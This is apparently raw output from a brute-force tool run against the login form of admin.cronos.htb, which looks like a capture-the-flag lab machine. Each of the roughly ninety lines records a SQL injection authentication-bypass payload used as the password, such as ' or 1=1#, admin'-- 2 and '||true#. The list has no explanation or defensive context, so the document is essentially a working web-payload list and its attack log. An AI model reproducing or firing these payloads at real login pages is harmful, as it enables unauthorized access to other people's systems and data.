[80][http-post-form] host: admin.cronos.htb   password: ' or 1 or '
[80][http-post-form] host: admin.cronos.htb   password: admin' or '
[80][http-post-form] host: admin.cronos.htb   password: admin' or '1'='2
[80][http-post-form] host: admin.cronos.htb   password: admin' #
[80][http-post-form] host: admin.cronos.htb   password: admin' or '1'='1
[80][http-post-form] host: admin.cronos.htb   password: admin' or '1'='1'#
[80][http-post-form] host: admin.cronos.htb   password: admin'or 1=1 or ''='
[80][http-post-form] host: admin.cronos.htb   password: admin' or 1=1#
[80][http-post-form] host: admin.cronos.htb   password: ' or         0=0 #
[80][http-post-form] host: admin.cronos.htb   password: ' or 0=0 #
[80][http-post-form] host: admin.cronos.htb   password: ' or '1'='1'#
[80][http-post-form] host: admin.cronos.htb   password: ' or 1=1;#
[80][http-post-form] host: admin.cronos.htb   password: ' or 1=1#
[80][http-post-form] host: admin.cronos.htb   password: ' or 1=1 LIMIT 1;#
[80][http-post-form] host: admin.cronos.htb   password: 'or 1=1 or ''='
[80][http-post-form] host: admin.cronos.htb   password: ' OR 'x'='x'#;
[80][http-post-form] host: admin.cronos.htb   password: '=' 'or' and '=' 'or'
[80][http-post-form] host: admin.cronos.htb   password: '-''#
[80][http-post-form] host: admin.cronos.htb   password: '-''-- 2
[80][http-post-form] host: admin.cronos.htb   password: '&''-- 2
[80][http-post-form] host: admin.cronos.htb   password: '&''#
[80][http-post-form] host: admin.cronos.htb   password: '^''-- 2
[80][http-post-form] host: admin.cronos.htb   password: '^''#
[80][http-post-form] host: admin.cronos.htb   password: '*''-- 2
[80][http-post-form] host: admin.cronos.htb   password: '*''#
[80][http-post-form] host: admin.cronos.htb   password: '=''-- 2
[80][http-post-form] host: admin.cronos.htb   password: '=''#
[80][http-post-form] host: admin.cronos.htb   password: 'oR'2'-- 2
[80][http-post-form] host: admin.cronos.htb   password: 'oR'2'#
[80][http-post-form] host: admin.cronos.htb   password: 'oR'2'oR'
[80][http-post-form] host: admin.cronos.htb   password: 'oR(2)-- 2
[80][http-post-form] host: admin.cronos.htb   password: 'oR(2)#
[80][http-post-form] host: admin.cronos.htb   password: 'oR(2)oR'
[80][http-post-form] host: admin.cronos.htb   password: 'oR 2-- 2
[80][http-post-form] host: admin.cronos.htb   password: 'oR 2#
[80][http-post-form] host: admin.cronos.htb   password: 'oR 2 oR'
[80][http-post-form] host: admin.cronos.htb   password: 'oR/**/2-- 2
[80][http-post-form] host: admin.cronos.htb   password: 'oR/**/2#
[80][http-post-form] host: admin.cronos.htb   password: 'oR/**/2/**/oR'
[80][http-post-form] host: admin.cronos.htb   password: 'oR'2'='2'oR'
[80][http-post-form] host: admin.cronos.htb   password: 'oR'2'='2'-- 2
[80][http-post-form] host: admin.cronos.htb   password: 'oR'2'='2'#
[80][http-post-form] host: admin.cronos.htb   password: 'oR 2=2-- 2
[80][http-post-form] host: admin.cronos.htb   password: 'oR 2=2#
[80][http-post-form] host: admin.cronos.htb   password: 'oR 2=2 oR'
[80][http-post-form] host: admin.cronos.htb   password: 'oR/**/2=2-- 2
[80][http-post-form] host: admin.cronos.htb   password: 'oR/**/2=2#
[80][http-post-form] host: admin.cronos.htb   password: 'oR/**/2=2/**/oR'
[80][http-post-form] host: admin.cronos.htb   password: 'oR(2)=2-- 2
[80][http-post-form] host: admin.cronos.htb   password: 'oR(2)=2#
[80][http-post-form] host: admin.cronos.htb   password: 'oR(2)=(2)oR'
[80][http-post-form] host: admin.cronos.htb   password: 'oR'2'='2' LimIT 1-- 2
[80][http-post-form] host: admin.cronos.htb   password: 'oR'2'='2' LimIT 1#
[80][http-post-form] host: admin.cronos.htb   password: 'oR true-- 2
[80][http-post-form] host: admin.cronos.htb   password: 'oR true#
[80][http-post-form] host: admin.cronos.htb   password: 'oR(true)-- 2
[80][http-post-form] host: admin.cronos.htb   password: 'oR true oR'
[80][http-post-form] host: admin.cronos.htb   password: 'oR(true)#
[80][http-post-form] host: admin.cronos.htb   password: 'oR(true)oR'
[80][http-post-form] host: admin.cronos.htb   password: 'oR/**/true-- 2
[80][http-post-form] host: admin.cronos.htb   password: 'oR/**/true#
[80][http-post-form] host: admin.cronos.htb   password: 'oR/**/true/**/oR'
[80][http-post-form] host: admin.cronos.htb   password: 'oR'2'LiKE'2'#
[80][http-post-form] host: admin.cronos.htb   password: 'oR'2'LiKE'2'-- 2
[80][http-post-form] host: admin.cronos.htb   password: 'oR'2'LiKE'2'oR'
[80][http-post-form] host: admin.cronos.htb   password: 'oR(2)LiKE(2)-- 2
[80][http-post-form] host: admin.cronos.htb   password: 'oR(2)LiKE(2)#
[80][http-post-form] host: admin.cronos.htb   password: 'oR(2)LiKE(2)oR'
[80][http-post-form] host: admin.cronos.htb   password: admin'-- 2
[80][http-post-form] host: admin.cronos.htb   password: admin'#
[80][http-post-form] host: admin.cronos.htb   password: '||2-- 2
[80][http-post-form] host: admin.cronos.htb   password: '||'2'||'
[80][http-post-form] host: admin.cronos.htb   password: '||2#
[80][http-post-form] host: admin.cronos.htb   password: '||2||'
[80][http-post-form] host: admin.cronos.htb   password: '||'2'='2'||'
[80][http-post-form] host: admin.cronos.htb   password: '||2=2-- 2
[80][http-post-form] host: admin.cronos.htb   password: '||2=2#
[80][http-post-form] host: admin.cronos.htb   password: '||2=2||'
[80][http-post-form] host: admin.cronos.htb   password: '||true-- 2
[80][http-post-form] host: admin.cronos.htb   password: '||true#
[80][http-post-form] host: admin.cronos.htb   password: '||true||'
[80][http-post-form] host: admin.cronos.htb   password: '||'2'LiKE'2'-- 2
[80][http-post-form] host: admin.cronos.htb   password: '||'2'LiKE'2'#
[80][http-post-form] host: admin.cronos.htb   password: '||'2'LiKE'2'||'
[80][http-post-form] host: admin.cronos.htb   password: '||(2)LiKE(2)-- 2
[80][http-post-form] host: admin.cronos.htb   password: '||(2)LiKE(2)#
[80][http-post-form] host: admin.cronos.htb   password: '||(2)LiKE(2)||'
[80][http-post-form] host: admin.cronos.htb   password: ' or 1=1 limit 1 -- -+
[80][http-post-form] host: admin.cronos.htb   password: %bf' Or 1=1 -- 2
[80][http-post-form] host: admin.cronos.htb   password: %bf' Or 1-- 2
[80][http-post-form] host: admin.cronos.htb   password: %bf'Or(1)-- 2
[80][http-post-form] host: admin.cronos.htb   password: %bf'||1-- 2